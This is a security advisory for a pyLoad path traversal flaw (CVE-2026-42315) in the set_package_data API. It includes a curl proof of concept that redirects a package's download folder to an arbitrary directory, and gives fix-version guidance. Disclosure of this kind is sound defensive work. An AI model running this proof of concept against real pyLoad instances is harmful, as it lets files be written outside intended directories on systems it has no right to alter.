CVE-2026-42315: pyLoad: Path Traversal via Package Folder Name in set_package_data
Summary No sanitization of package folder name allows writing files anywhere outside the intended download directory.
Affected Component - src/pyload/core/api/init.py - Function: setpackagedata()
Details When passing a folder name in the setpackagedata() API function call inside the data object with key "folder", there is no sanitization at all, allowing a user with Perms.MODIFY to specify arbitrary directories as download locations for a package.
PoC 1) Create a package, note response package ID e.g. 5 curl -X 'POST' \ 'http://localhost:8000/api/addpackage' \ -H 'accept: application/json' \ -H 'X-API-Key: <valid api key>' \ -H 'Content-Type: application/json' \ -d '{ "name": "setpackagedataexploitpoc", "links": [ "http://example.com/file.txt" ], "dest": 1 }'
2) Call setpackagedata for this package ID with an arbitrary directory curl -X 'POST' \ 'http://localhost:8000/api/setpackagedata' \ -H 'accept: /' \ -H 'X-API-Key: <valid api key>' \ -H 'Content-Type: application/json' \ -d '{ "packageid": 5, "data": { "folder": "/users/root/" } }'
3) New download folder will be set without any checks curl -X 'GET' \ 'http://localhost:8000/api/getqueue' \ -H 'accept: application/json' \ -H 'X-API-Key: <valid api key>' Response: [ { "pid": 5, "name": "setpackagedataexploitpoc", "folder": "/users/root/", "site": "", "password": "", "dest": 1, "order": 1, "linksdone": 0, "sizedone": 0, "sizetotal": 0, "linkstotal": 1, "links": null, "fids": null } ]
Impact Allows Absolute Path Traversal to write in an arbitrary directory as long as the pyLoad process has write access.
Other sources
pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, when passing a folder name in the setpackagedata() API function call inside the data object with key "folder", there is no sanitization at all, allowing a user with Perms.MODIFY to specify arbitrary directories as download locations for a package. This vulnerability is fixed in 0.5.0b3.dev100.
— MITRE
Affected Software
Event History
Frequently Asked Questions
What is the severity of CVE-2026-42315?
CVE-2026-42315 is rated as a high severity vulnerability due to its potential for file system manipulation.
How do I fix CVE-2026-42315?
To fix CVE-2026-42315, update the pyload-ng package to version 0.5.0b3.dev100 or later.
What components are affected by CVE-2026-42315?
CVE-2026-42315 affects the `set_package_data()` function in `src/pyload/core/api/__init__.py`.
What type of vulnerability is CVE-2026-42315?
CVE-2026-42315 is a path traversal vulnerability that allows writing files outside the intended directory.
How can CVE-2026-42315 affect my system?
Exploitation of CVE-2026-42315 could lead to unauthorized file access or modification on your system.